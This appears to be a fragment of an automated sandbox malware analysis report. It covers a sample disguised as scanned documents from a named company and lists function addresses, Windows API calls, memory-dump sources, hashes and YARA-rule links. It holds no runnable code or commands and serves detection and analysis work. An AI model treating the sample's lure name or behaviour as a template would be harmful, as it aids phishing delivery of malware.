                                                      • Opcode Fuzzy Hash: ddf42806a33a08e46e0710d9e8269fd26c18e132771191121f837db2b372094d
                                                      • Instruction Fuzzy Hash: 12E04F35434A108BCE06EF18F895EAAB359AB17321B5219A9E5128B1A1AB7028918A59
                                                      Function 002DD21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: LocalTime
                                                      • String ID: %.3d$X64
                                                      • API String ID: 481472006-1077770165
                                                      • Opcode ID: 85e97cd3391afd7987b40a64dd8d81f7fbb4d3c465f73525799430975b2bf1cc
                                                      • Instruction ID: d67fdfb5c5ba9d80e6219f87d4e760cdd1de4ad11606026ec0e970212e5875b3
                                                      • Opcode Fuzzy Hash: 85e97cd3391afd7987b40a64dd8d81f7fbb4d3c465f73525799430975b2bf1cc
                                                      • Instruction Fuzzy Hash: B0D012A1878508EACF909AD0CC4D8F9B3BCAB18341F508453FC06D1142D674D9296B61
                                                      Function 00312322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0031232C
                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0031233F
                                                        • Part of subcall function 002EE97B: Sleep.KERNEL32 ref: 002EE9F3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: FindMessagePostSleepWindow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 529655941-2988720461
                                                      • Opcode ID: 1329273139cc20e5f3458e24ba3c84b1cb4d72eb8f6161f289815fdf37e501e1
                                                      • Instruction ID: bf4d6dbfb736887690cc82cf489518a2bcbe70dbd0925883c2531448007536a0
                                                      • Opcode Fuzzy Hash: 1329273139cc20e5f3458e24ba3c84b1cb4d72eb8f6161f289815fdf37e501e1
                                                      • Instruction Fuzzy Hash: FCD022323E0300BBE664B771DC0FFC6FA489B04B00F008902B305AA0D0C8F0B800CA04
                                                      Function 00312356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0031236C
                                                      • PostMessageW.USER32(00000000), ref: 00312373
                                                        • Part of subcall function 002EE97B: Sleep.KERNEL32 ref: 002EE9F3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: FindMessagePostSleepWindow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 529655941-2988720461
                                                      • Opcode ID: f7b01a059d3c2ee18bb6b58a53bed34c415deab959c9bded4e73b18aaf398cb3
                                                      • Instruction ID: b9712b28d0e20971a2f901f9d88e87263d86fa4d775ccb4e56a7ecc7d081eaae
                                                      • Opcode Fuzzy Hash: f7b01a059d3c2ee18bb6b58a53bed34c415deab959c9bded4e73b18aaf398cb3
                                                      • Instruction Fuzzy Hash: 24D022323E03007BE665B771DC0FFC6FA489B09B00F008902B301EA0D0C8F0B800CA08